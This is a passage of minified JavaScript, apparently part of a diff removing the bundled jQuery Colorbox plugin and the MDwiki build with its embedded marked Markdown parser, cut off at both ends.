c,d="none"===K.transition?0:K.speed;A.remove(),A=Z(X,"LoadedContent").append(b),A.hide().appendTo(B.show()).css({width:g(),overflow:K.scrolling?"auto":"hidden"}).css({height:h()}).prependTo(t),B.hide(),a(R).css({"float":"none"}),o&&a("select").not(r.find("select")).filter(function(){return"hidden"!==this.style.visibility}).css({visibility:"hidden"}).one(k,function(){this.style.visibility="inherit"}),c=function(){function s(){n&&r[0].style.removeAttribute("filter")}var b,c,h,l,o,p,q,g=y.length,i="frameBorder",k="allowTransparency";if(S){if(l=function(){clearTimeout(V),C.detach().hide(),eb(j,K.onComplete)},n&&R&&A.fadeIn(100),D.html(K.title).add(A).show(),g>1){if("string"==typeof K.current&&E.html(K.current.replace("{current}",Q+1).replace("{total}",g)).show(),G[K.loop||g-1>Q?"show":"hide"]().html(K.next),H[K.loop||Q?"show":"hide"]().html(K.previous),K.slideshow&&F.show(),K.preloading)for(b=[$(-1),$(1)];c=y[b.pop()];)q=a.data(c,e),q&&q.href?(o=q.href,a.isFunction(o)&&(o=o.call(c))):o=c.href,ab(o)&&(p=new Image,p.src=o)}else J.hide();K.iframe?(h=Z("iframe")[0],i in h&&(h[i]=0),k in h&&(h[k]="true"),h.name=f+ +new Date,K.fastIframe?l():a(h).one("load",l),h.src=K.href,K.scrolling||(h.scrolling="no"),a(h).addClass(f+"Iframe").appendTo(A).one(m,function(){h.src="//about:blank"})):l(),"fade"===K.transition?r.fadeTo(d,1,s):s()}},"fade"===K.transition?r.fadeTo(d,0,function(){W.position(0,c)}):W.position(d,c)}},W.load=function(b){var c,d,e=W.prep;T=!0,R=!1,P=y[Q],b||db(),eb(m),eb(i,K.onLoad),K.h=K.height?_(K.height,"y")-N-L:K.innerHeight&&_(K.innerHeight,"y"),K.w=K.width?_(K.width,"x")-O-M:K.innerWidth&&_(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=_(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=_(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,V=setTimeout(function(){C.show().appendTo(t)},100),K.inline?(Z(X).hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):ab(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Z(X,"Error").html(K.imgError))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(K.loop||y[Q+1])&&(R.style.cursor="pointer",R.onclick=function(){W.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c){e("error"===c?Z(X,"Error").html(K.xhrError):a(this).contents())})},W.next=function(){!T&&y[1]&&(K.loop||y[Q+1])&&(Q=$(1),W.load())},W.prev=function(){!T&&y[1]&&(K.loop||Q)&&(Q=$(-1),W.load())},W.close=function(){S&&!U&&(U=!0,S=!1,eb(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),eb(m),A.remove(),setTimeout(function(){U=!1,eb(l,K.onClosed)},1)}))},W.remove=function(){a([]).add(r).add(q).remove(),r=null,a("."+g).removeData(e).removeClass(g).die()},W.element=function(){return a(P)},W.settings=d)})(jQuery,document,this);</script>
-<!-- END extlib/js/jquery.colorbox.min.js -->
-<!-- START dist/MDwiki.min.js -->
-<script type="text/javascript">function googlemapsReady(){googlemapsLoadDone.resolve()}(function(){function a(a){this.tokens=[],this.tokens.links={},this.options=a||h.defaults,this.rules=i.normal,this.options.gfm&&(this.rules=this.options.tables?i.tables:i.gfm)}function b(a,b){if(this.options=b||h.defaults,this.links=a,this.rules=j.normal,!this.links)throw new Error("Tokens array requires a `links` property.");this.options.gfm?this.rules=this.options.breaks?j.breaks:j.gfm:this.options.pedantic&&(this.rules=j.pedantic)}function c(a){this.tokens=[],this.token=null,this.options=a||h.defaults}function d(a,b){return a.replace(b?/&/g:/&(?!#?\w+;)/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#39;")}function e(a,b){return a=a.source,b=b||"",function c(d,e){return d?(e=e.source||e,e=e.replace(/(^|[^\[])\^/g,"$1"),a=a.replace(d,e),c):new RegExp(a,b)}}function f(){}function g(a){for(var b,c,d=1;d<arguments.length;d++){b=arguments[d];for(c in b)Object.prototype.hasOwnProperty.call(b,c)&&(a[c]=b[c])}return a}function h(b,e,f){if(f||"function"==typeof e){f||(f=e,e=null),e&&(e=g({},h.defaults,e));var i=a.lex(i,e),j=e.highlight,k=0,l=i.length,m=0;if(!j||j.length<3)return f(null,c.parse(i,e));for(var n=function(){delete e.highlight;var a=c.parse(i,e);return e.highlight=j,f(null,a)};l>m;m++)!function(a){return"code"===a.type?(k++,j(a.text,a.lang,function(b,c){return null==c||c===a.text?--k||n():(a.text=c,a.escaped=!0,void(--k||n()))})):void 0}(i[m])}else try{return e&&(e=g({},h.defaults,e)),c.parse(a.lex(b,e),e)}catch(o){if(o.message+="\nPlease report this to https://github.com/chjj/marked.",(e||h.defaults).silent)return"<p>An error occured:</p><pre>"+d(o.message+"",!0)+"</pre>";throw o}}var i={newline:/^\n+/,code:/^( {4}[^\n]+\n*)+/,fences:f,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,nptable:f,lheading:/^([^\n]+)\n *(=|-){3,} *\n*/,blockquote:/^( *>[^\n]+(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,table:f,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,text:/^[^\n]+/};i.bullet=/(?:[*+-]|\d+\.)/,i.item=/^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/,i.item=e(i.item,"gm")(/bull/g,i.bullet)(),i.list=e(i.list)(/bull/g,i.bullet)("hr",/\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)(),i._tag="(?!(?:a|em|strong|small|s|cite|q|dfn|abbr|data|time|code|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b",i.html=e(i.html)("comment",/<!--[\s\S]*?-->/)("closed",/<(tag)[\s\S]+?<\/\1>/)("closing",/<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)(/tag/g,i._tag)(),i.paragraph=e(i.paragraph)("hr",i.hr)("heading",i.heading)("lheading",i.lheading)("blockquote",i.blockquote)("tag","<"+i._tag)("def",i.def)(),i.normal=g({},i),i.gfm=g({},i.normal,{fences:/^ *(`{3,}|~{3,}) *(\S+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,paragraph:/^/}),i.gfm.paragraph=e(i.paragraph)("(?!","(?!"+i.gfm.fences.source.replace("\\1","\\2")+"|")(),i.tables=g({},i.gfm,{nptable:/^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,table:/^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/}),a.rules=i,a.lex=function(b,c){var d=new a(c);return d.lex(b)},a.prototype.lex=function(a){return a=a.replace(/\r\n|\r/g,"\n").replace(/\t/g,"    ").replace(/\u00a0/g," ").replace(/\u2424/g,"\n"),this.token(a,!0)},a.prototype.token=function(a,b){for(var c,d,e,f,g,h,j,k,l,a=a.replace(/^ +$/gm,"");a;)if((e=this.rules.newline.exec(a))&&(a=a.substring(e[0].length),e[0].length>1&&this.tokens.push({type:"space"})),e=this.rules.code.exec(a))a=a.substring(e[0].length),e=e[0].replace(/^ {4}/gm,""),this.tokens.push({type:"code",text:this.options.pedantic?e:e.replace(/\n+$/,"")});else if(e=this.rules.fences.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"code",lang:e[2],text:e[3]});else if(e=this.rules.heading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:e[1].length,text:e[2]});else if(b&&(e=this.rules.nptable.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].split(/ *\| */);this.tokens.push(h)}else if(e=this.rules.lheading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:"="===e[2]?1:2,text:e[1]});else if(e=this.rules.hr.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"hr"});else if(e=this.rules.blockquote.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"blockquote_start"}),e=e[0].replace(/^ *> ?/gm,""),this.token(e,b),this.tokens.push({type:"blockquote_end"});else if(e=this.rules.list.exec(a)){for(a=a.substring(e[0].length),f=e[2],this.tokens.push({type:"list_start",ordered:f.length>1}),e=e[0].match(this.rules.item),c=!1,l=e.length,k=0;l>k;k++)h=e[k],j=h.length,h=h.replace(/^ *([*+-]|\d+\.) +/,""),~h.indexOf("\n ")&&(j-=h.length,h=this.options.pedantic?h.replace(/^ {1,4}/gm,""):h.replace(new RegExp("^ {1,"+j+"}","gm"),"")),this.options.smartLists&&k!==l-1&&(g=i.bullet.exec(e[k+1])[0],f===g||f.length>1&&g.length>1||(a=e.slice(k+1).join("\n")+a,k=l-1)),d=c||/\n\n(?!\s*$)/.test(h),k!==l-1&&(c="\n"===h[h.length-1],d||(d=c)),this.tokens.push({type:d?"loose_item_start":"list_item_start"}),this.token(h,!1),this.tokens.push({type:"list_item_end"});this.tokens.push({type:"list_end"})}else if(e=this.rules.html.exec(a))a=a.substring(e[0].length),this.tokens.push({type:this.options.sanitize?"paragraph":"html",pre:"pre"===e[1]||"script"===e[1],text:e[0]});else if(b&&(e=this.rules.def.exec(a)))a=a.substring(e[0].length),this.tokens.links[e[1].toLowerCase()]={href:e[2],title:e[3]};else if(b&&(e=this.rules.table.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/(?: *\| *)?\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].replace(/^ *\| *| *\| *$/g,"").split(/ *\| */);this.tokens.push(h)}else if(b&&(e=this.rules.paragraph.exec(a)))a=a.substring(e[0].length),this.tokens.push({type:"paragraph",text:"\n"===e[1][e[1].length-1]?e[1].slice(0,-1):e[1]});else if(e=this.rules.text.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"text",text:e[0]});else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return this.tokens};var j={escape:/^\\([\\`*{}\[\]()#+\-.!_>])/,autolink:/^<([^ >]+(@|:\/)[^ >]+)>/,url:f,tag:/^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,link:/^!?\[(inside)\]\(href\)/,reflink:/^!?\[(inside)\]\s*\[([^\]]*)\]/,nolink:/^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,strong:/^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,em:/^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,code:/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,br:/^ {2,}\n(?!\s*$)/,del:f,text:/^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/};j._inside=/(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/,j._href=/\s*<?(.*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/,j.link=e(j.link)("inside",j._inside)("href",j._href)(),j.reflink=e(j.reflink)("inside",j._inside)(),j.normal=g({},j),j.pedantic=g({},j.normal,{strong:/^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,em:/^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/}),j.gfm=g({},j.normal,{escape:e(j.escape)("])","~|])")(),url:/^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,del:/^~~(?=\S)([\s\S]*?\S)~~/,text:e(j.text)("]|","~]|")("|","|https?://|")()}),j.breaks=g({},j.gfm,{br:e(j.br)("{2,}","*")(),text:e(j.gfm.text)("{2,}","*")()}),b.rules=j,b.output=function(a,c,d){var e=new b(c,d);return e.output(a)},b.prototype.output=function(a){for(var b,c,e,f,g="";a;)if(f=this.rules.escape.exec(a))a=a.substring(f[0].length),g+=f[1];else if(f=this.rules.autolink.exec(a))a=a.substring(f[0].length),"@"===f[2]?(c=this.mangle(":"===f[1][6]?f[1].substring(7):f[1]),e=this.mangle("mailto:")+c):(c=d(f[1]),e=c),g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.url.exec(a))a=a.substring(f[0].length),c=d(f[1]),e=c,g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.tag.exec(a))a=a.substring(f[0].length),g+=this.options.sanitize?d(f[0]):f[0];else if(f=this.rules.link.exec(a))a=a.substring(f[0].length),g+=this.outputLink(f,{href:f[2],title:f[3]});else if((f=this.rules.reflink.exec(a))||(f=this.rules.nolink.exec(a))){if(a=a.substring(f[0].length),b=(f[2]||f[1]).replace(/\s+/g," "),b=this.links[b.toLowerCase()],!b||!b.href){g+=f[0][0],a=f[0].substring(1)+a;continue}g+=this.outputLink(f,b)}else if(f=this.rules.strong.exec(a))a=a.substring(f[0].length),g+="<strong>"+this.output(f[2]||f[1])+"</strong>";else if(f=this.rules.em.exec(a))a=a.substring(f[0].length),g+="<em>"+this.output(f[2]||f[1])+"</em>";else if(f=this.rules.code.exec(a))a=a.substring(f[0].length),g+="<code>"+d(f[2],!0)+"</code>";else if(f=this.rules.br.exec(a))a=a.substring(f[0].length),g+="<br>";else if(f=this.rules.del.exec(a))a=a.substring(f[0].length),g+="<del>"+this.output(f[1])+"</del>";else if(f=this.rules.text.exec(a))a=a.substring(f[0].length),g+=d(f[0]);else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return g},b.prototype.outputLink=function(a,b){return"!"!==a[0][0]?'<a href="'+d(b.href)+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"+this.output(a[1])+"</a>":'<img src="'+d(b.href)+'" alt="'+d(a[1])+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"},b.prototype.smartypants=function(a){return this.options.smartypants?a.replace(/--/g,"—").replace(/'([^']*)'/g,"‘$1’").replace(/"([^"]*)"/g,"“$1”").replace(/\.{3}/g,"…"):a},b.prototype.mangle=function(a){for(var b,c="",d=a.length,e=0;d>e;e++)b=a.charCodeAt(e),Math.random()>.5&&(b="x"+b.toString(16)),c+="&#"+b+";";return c},c.parse=function(a,b){var d=new c(b);return d.parse(a)},c.prototype.parse=function(a){this.inline=new b(a.links,this.options),this.tokens=a.reverse();for(var c="";this.next();)c+=this.tok();return c},c.prototype.next=function(){return this.token=this.tokens.pop()},c.prototype.peek=function(){return this.tokens[this.tokens.length-1]||0},c.prototype.parseText=function(){for(var a=this.token.text;"text"===this.peek().type;)a+="\n"+this.next().text;return this.inline.output(a)},c.prototype.tok=function(){switch(this.token.type){case"space":return"";case"hr":return"<hr>\n";case"heading":return"<h"+this.token.depth+">"+this.inline.output(this.token.text)+"</h"+this.token.depth+">\n";case"code":if(this.options.highlight){var a=this.options.highlight(this.token.text,this.token.lang);null!=a&&a!==this.token.text&&(this.token.escaped=!0,this.token.text=a)}return this.token.escaped||(this.token.text=d(this.token.text,!0)),"<pre><code"+(this.token.lang?' class="'+this.options.langPrefix+this.token.lang+'"':"")+">"+this.token.text+"</code></pre>\n";case"table":var b,c,e,f,g,h="";for(h+="<thead>\n<tr>\n",c=0;c<this.token.header.length;c++)b=this.inline.output(this.token.header[c]),h+=this.token.align[c]?'<th align="'+this.token.align[c]+'">'+b+"</th>\n":"<th>"+b+"</th>\n";for(h+="</tr>\n</thead>\n",h+="<tbody>\n",c=0;c<this.token.cells.length;c++){for(e=this.token.cells[c],h+="<tr>\n",g=0;g<e.length;g++)f=this.inline.output(e[g]),h+=this.token.align[g]?'<td align="'+this.token.align[g]+'">'+f+"</td>\n":"<td>"+f+"</td>\n";h+="</tr>\n"}return h+="</tbody>\n","<table>\n"+h+"</table>\n";case"blockquote_start":for(var h="";"blockquote_end"!==this.next().type;)h+=this.tok();return"<blockquote>\n"+h+"</blockquote>\n";case"list_start":for(var i=this.token.ordered?"ol":"ul",h="";"list_end"!==this.next().type;)h+=this.tok();return"<"+i+">\n"+h+"</"+i+">\n";case"list_item_start":for(var h="";"list_item_end"!==this.next().type;)h+="text"===this.token.type?this.parseText():this.tok();return"<li>"+h+"</li>\n";case"loose_item_start":for(var h="";"list_item_end"!==this.next().type;)h+=this.tok();return"<li>"+h+"</li>\n";case"html":return this.token.pre||this.options.pedantic?this.token.text:this.inline.output(this.token.text);case"paragraph":return"<p>"+this.inline.output(this.token.text)+"</p>\n";case"text":return"<p>"+this.parseText()+"</p>\n"}},f.exec=f,h.options=h.setOptions=function(a){return g(h.defaults,a),h},h.defaults={gfm:!0,tables:!0,breaks:!1,pedantic:!1,sanitize:!1,smartLists:!1,silent:!1,highlight:null,langPrefix:"lang-"},h.Parser=c,h.parser=c.parse,h.Lexer=a,h.lexer=a.lex,h.InlineLexer=b,h.inlineLexer=b.output,h.parse=h,"object"==typeof exports?module.exports=h:"function"==typeof define&&define.amd?define(function(){return h}):this.marked=h}).call(function(){return this||("undefined"!=typeof window?window:global)}()),function(a){"use strict";a("html").addClass("md-hidden-load"),a.md=function(b){return a.md.publicMethods[b]?a.md.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.md")},a.md.config={title:null,useSideMenu:!0,lineBreaks:"gfm",additionalFooterText:"",anchorCharacter:"&para;",tocAnchor:"[ &uarr; ]"},a.md.gimmicks=[],a.md.stages=[],a.md.mainHref="",a.md.inPageAnchor="",a.md.loglevel={TRACE:10,DEBUG:20,INFO:30,WARN:40,ERROR:50,FATAL:60},a.md.logThreshold=a.md.loglevel.WARN}(jQuery),function(a){"use strict";a.md.getLogger=function(){var b=a.md.loglevel,c=function(c){var d=b[c];return function(b){a.md.logThreshold<=d&&console.log("["+c+"] "+b)}},d={};return d.trace=c("TRACE"),d.debug=c("DEBUG"),d.info=c("INFO"),d.warn=c("WARN"),d.error=c("ERROR"),d.fatal=c("FATAL"),d}}(jQuery),function(a){"use strict";var b=a.md.getLogger();a.Stage=function(c){var d=a.extend(a.Deferred(),{});return d.name=c,d.events=[],d.started=!1,d.reset=function(){d.complete=a.Deferred(),d.outstanding=[]},d.reset(),d.subscribe=function(b){d.started&&a.error("Subscribing to stage which already started!"),d.events.push(b)},d.unsubscribe=function(a){d.events.remove(a)},d.executeSubscribedFn=function(e){var f=a.Deferred();d.outstanding.push(f),a.md.util.wait(2500).done(function(){"resolved"!==f.state()&&(b.fatal("Timeout reached for done callback in stage: "+d.name+". Did you forget a done() call in a .subscribe() ?"),b.fatal("stage "+c+" failed running subscribed function: "+e))});var g=function(){f.resolve()};e(g)},d.run=function(){d.started=!0,a(d.events).each(function(a,b){d.executeSubscribedFn(b)}),0===d.outstanding.length&&d.resolve(),a.when.apply(a,d.outstanding).done(function(){d.resolve()}).fail(function(){d.resolve()})},d.done(function(){b.debug("stage "+d.name+" completed successfully.")}),d.fail(function(){b.debug("stage "+d.name+" completed with errors!")}),d}}(jQuery),function(a){"use strict";function b(){a.md.stages=[a.Stage("init"),a.Stage("load"),a.Stage("transform"),a.Stage("ready"),a.Stage("skel_ready"),a.Stage("bootstrap"),a.Stage("pregimmick"),a.Stage("gimmick"),a.Stage("postgimmick"),a.Stage("all_ready"),a.Stage("final_tests")],a.md.stage=function(b){var c=a.grep(a.md.stages,function(a){return a.name===b});return 0!==c.length?c[0]:void a.error("A stage by name "+b+"  does not exist")}}function c(){var b=a.md.stages;a.md.stages=[],a(b).each(function(b,c){a.md.stages.push(a.Stage(c.name))})}function d(b){var c={gfm:!0,tables:!0,breaks:!0};"original"===a.md.config.lineBreaks?c.breaks=!1:"gfm"===a.md.config.lineBreaks&&(c.breaks=!0),marked.setOptions(c);var d=marked(b);return d}function e(){var b="";a.md.stage("init").subscribe(function(c){var d={url:a.md.mainHref,dataType:"text"};a.ajax(d).done(function(a){b=a,c()}).fail(function(){var b=a.md.getLogger();b.fatal("Could not get "+a.md.mainHref),c()})}),a.md.stage("transform").subscribe(function(b){var c=a.md.mainHref.lastIndexOf("/"),d=a.md.mainHref.substring(0,c+1);a.md.baseUrl=d,b()}),a.md.stage("transform").subscribe(function(c){var e=d(b);a("#md-content").html(e),b="";var g=a.Deferred();f(g),g.always(function(){c()})})}function f(b){function c(){return a("a").filter(function(){var b=a(this).attr("href"),c=a(this).toptext(),d=a.md.util.hasMarkdownFileExtension(b),e="include"===c,f=c.startsWith("preview:");return(e||f)&&d})}function e(b,c){function d(a){return 3===a.nodeType}var e=0,f=[];return b.each(function(a,b){c>e&&(f.push(b),d(b)||e++)}),a(f)}var f=c(),g=a.md.util.countDownLatch(f.length);g.always(function(){b.resolve()}),f.each(function(b,c){var f=a(c),h=f.attr("href"),i=f.toptext();a.ajax({url:h,dataType:"text"}).done(function(b){var c=a(d(b));if(i.startsWith("preview:")){var g=parseInt(i.substring(8),10)||3,j=e(c,g);j.last().append('<a href="'+h+'"> ...read more &#10140;</a>'),j.insertBefore(f.parent("p").eq(0)),f.remove()}else c.insertAfter(f.parents("p")),f.remove()}).always(function(){g.countDown()})})}function g(a){return a?a.lastIndexOf("data:")>=0?!0:a.startsWith("mailto:")?!0:a.startsWith("file:")?!0:a.startsWith("ftp:")?!0:void 0:!1}function h(b,c){var d=a(b);void 0===c&&(c=""),d.find("a").not("#md-menu a").filter(function(){var b=a(this),c=b.attr("href");c&&0!==c.length||b.removeAttr("href")}),d.find("a, img").each(function(b,d){function e(b){return a.md.util.hasMarkdownFileExtension(b)?"#!"+b:b}var f=a(d),h=!1,i="href";f.attr(i)||(h=!0,i="src");var j=f.attr(i);if(!(j&&j.lastIndexOf("#!")>=0||g(j)||(h||!j.startsWith("#")||j.startsWith("#!")||f.click(function(b){b.preventDefault(),a.md.scrollToInPageAnchor(j)}),!a.md.util.isRelativeUrl(j)||h&&!a.md.util.isRelativePath(j)||!h&&a.md.util.isGimmickLink(f)))){var k=c+j;h?f.attr(i,k):a.md.util.isRelativePath(j)?f.attr(i,e(k)):f.attr(i,e(j))}})}function i(){a.md.stage("init").subscribe(function(b){a.md.NavigationDfd.done(function(){b()}).fail(function(){b()})}),a.md.stage("transform").subscribe(function(b){if(""===r){var c=a.md.getLogger();return c.info("no navgiation.md found, not using a navbar"),void b()}var d=marked(r),e=a("<div>"+d+"</div>");e.each(function(b,c){"SCRIPT"===c.tagName&&a("script").first().before(c)});var f=e.eq(0);f.find("p").each(function(b,c){var d=a(c);d.replaceWith(d.html())}),a("#md-menu").append(f.html()),b()}),a.md.stage("bootstrap").subscribe(function(b){h(a("#md-menu")),b()}),a.md.stage("postgimmick").subscribe(function(b){var c=a("#md-menu a").length,d=a("#md-menu .navbar-brand").eq(0).toptext().trim().length>0;!d&&1>=c&&a("#md-menu").hide(),b()})}function j(){a.md.stage("init").subscribe(function(b){a.md.ConfigDfd.done(function(){b()}).fail(function(){var c=a.md.getLogger();c.info("No config.json found, using default settings"),b()})})}function k(){a.md.stage("init").subscribe(function(b){a("#md-all").empty();var c='<div id="md-body"><div id="md-title"></div><div id="md-menu"></div><div id="md-content"></div></div>';a("#md-all").prepend(a(c)),b()})}function l(b){a.md.mainHref=b,e(),k(),a.md.stage("ready").subscribe(function(b){a.md.initializeGimmicks(),a.md.registerLinkGimmicks(),b()}),a.each(a.md.gimmicks,function(b,c){void 0!==c.load&&a.md.stage("load").subscribe(function(a){c.load(),a()})}),a.md.stage("ready").subscribe(function(b){a.md("createBasicSkeleton"),b()}),a.md.stage("bootstrap").subscribe(function(b){a.mdbootstrap("bootstrapify"),h(a("#md-content"),a.md.baseUrl),b()}),m()}function m(){a.md.stage("init").done(function(){a.md.stage("load").run()}),a.md.stage("load").done(function(){a.md.stage("transform").run()}),a.md.stage("transform").done(function(){a.md.stage("ready").run()}),a.md.stage("ready").done(function(){a.md.stage("skel_ready").run()}),a.md.stage("skel_ready").done(function(){a.md.stage("bootstrap").run()}),a.md.stage("bootstrap").done(function(){a.md.stage("pregimmick").run()}),a.md.stage("pregimmick").done(function(){a.md.stage("gimmick").run()}),a.md.stage("gimmick").done(function(){a.md.stage("postgimmick").run()}),a.md.stage("postgimmick").done(function(){a.md.stage("all_ready").run()}),a.md.stage("all_ready").done(function(){a("html").removeClass("md-hidden-load"),"function"==typeof window.callPhantom&&window.callPhantom({}),a.md.stage("final_tests").run()}),a.md.stage("final_tests").done(function(){c(),a("body").append('<span id="start-tests"></span>'),a("#start-tests").hide()}),a.md.stage("init").run()}function n(){var b;b=window.location.hash.substring(window.location.hash.startsWith("#!")?2:1),b=decodeURIComponent(b);var c=b.indexOf("#");-1!==c?(a.md.inPageAnchor=b.substring(c+1),a.md.mainHref=b.substring(0,c)):a.md.mainHref=b}function o(){var a="",b=window.location.hash||"";""===b||"#"===b||"#!"===b?a="#!index.md":b.startsWith("#!")&&b.endsWith("/")&&(a=b+"index.md"),a&&(window.location.hash=a)}var p=a.md.getLogger();b();var q={};a.md.publicMethods=a.extend({},a.md.publicMethods,q);var r="";a.md.NavigationDfd=a.Deferred();var s={url:"navigation.md",dataType:"text"};a.ajax(s).done(function(b){r=b,a.md.NavigationDfd.resolve()}).fail(function(){a.md.NavigationDfd.reject()}),a.md.ConfigDfd=a.Deferred(),a.ajax({url:"config.json",dataType:"text"}).done(function(b){try{var c=JSON.parse(b);a.md.config=a.extend(a.md.config,c),p.info("Found a valid config.json file, using configuration")}catch(d){p.error("config.json was not JSON parsable: "+d)}a.md.ConfigDfd.resolve()}).fail(function(b,c){p.error("unable to retrieve config.json: "+c),a.md.ConfigDfd.reject()}),a(document).ready(function(){j(),i(),n(),o(),a(window).bind("hashchange",function(){window.location.reload(!1)}),l(a.md.mainHref)})}(jQuery),function(a){var b={isRelativeUrl:function(a){return void 0===a?!1:-1===a.indexOf("://")?!0:!1},isRelativePath:function(a){return void 0===a?!1:a.startsWith("/")?!1:!0},isGimmickLink:function(a){return-1!==a.toptext().indexOf("gimmick:")?!0:!1},hasMarkdownFileExtension:function(b){var c=[".md",".markdown",".mdown"],d=!1,e=b.toLowerCase().split("#")[0];return a(c).each(function(a,b){e.toLowerCase().endsWith(b)&&(d=!0)}),d},wait:function(b){return a.Deferred(function(a){setTimeout(a.resolve,b)})}};a.md.util=a.extend({},a.md.util,b),"function"!=typeof String.prototype.startsWith&&(String.prototype.startsWith=function(a){return this.slice(0,a.length)===a}),"function"!=typeof String.prototype.endsWith&&(String.prototype.endsWith=function(a){return this.slice(this.length-a.length,this.length)===a}),a.fn.extend({toptext:function(){return this.clone().children().remove().end().text()}}),a.expr[":"].icontains=a.expr.createPseudo(function(b){return function(c){return a(c).toptext().toUpperCase().indexOf(b.toUpperCase())>=0}}),a.md.util.getInpageAnchorText=function(a){var b=a.replace(/ /g,"_");return b},a.md.util.getInpageAnchorHref=function(b,c){c=c||a.md.mainHref;var d=a.md.util.getInpageAnchorText(b);return"#!"+c+"#"+d},a.md.util.repeatUntil=function(b,c,d){function e(b,c,d){return 0===d?void f.reject():c()?void f.resolve():void a.md.util.wait(b).always(function(){e(b,c,d-1)})}d=d||10;var f=a.Deferred();return e(b,c,d),f},a.md.util.countDownLatch=function(b,c){c=c||0;var d=a.Deferred();return c>=b&&d.resolve(),d.capacity=b,d.countDown=function(){d.capacity--,d.capacity<=c&&d.resolve()},d}}(jQuery),function($){"use strict";function ScriptInfo(a){this.module=void 0,this.options={},this.src="",$.extend(this,a)}function LinkTrigger(a){this.trigger=void 0,this.module=void 0,this.callback=void 0,$.extend(this,a)}function insertInlineScript(a){var b=document.createElement("script");b.type="text/javascript",b.text=a,document.body.appendChild(b)}function checkLicense(a,b){if(-1===$.inArray(a,licenses)){var c=JSON.stringify(licenses);log.warn("license "+a+" is not known."),log.warn("Known licenses:"+c)}else"OTHER"===a&&log.warn("WARNING: Module "+b.name+" uses a script with unknown license. This may be a GPL license violation if this website is publically available!")}function loadScript(a){var 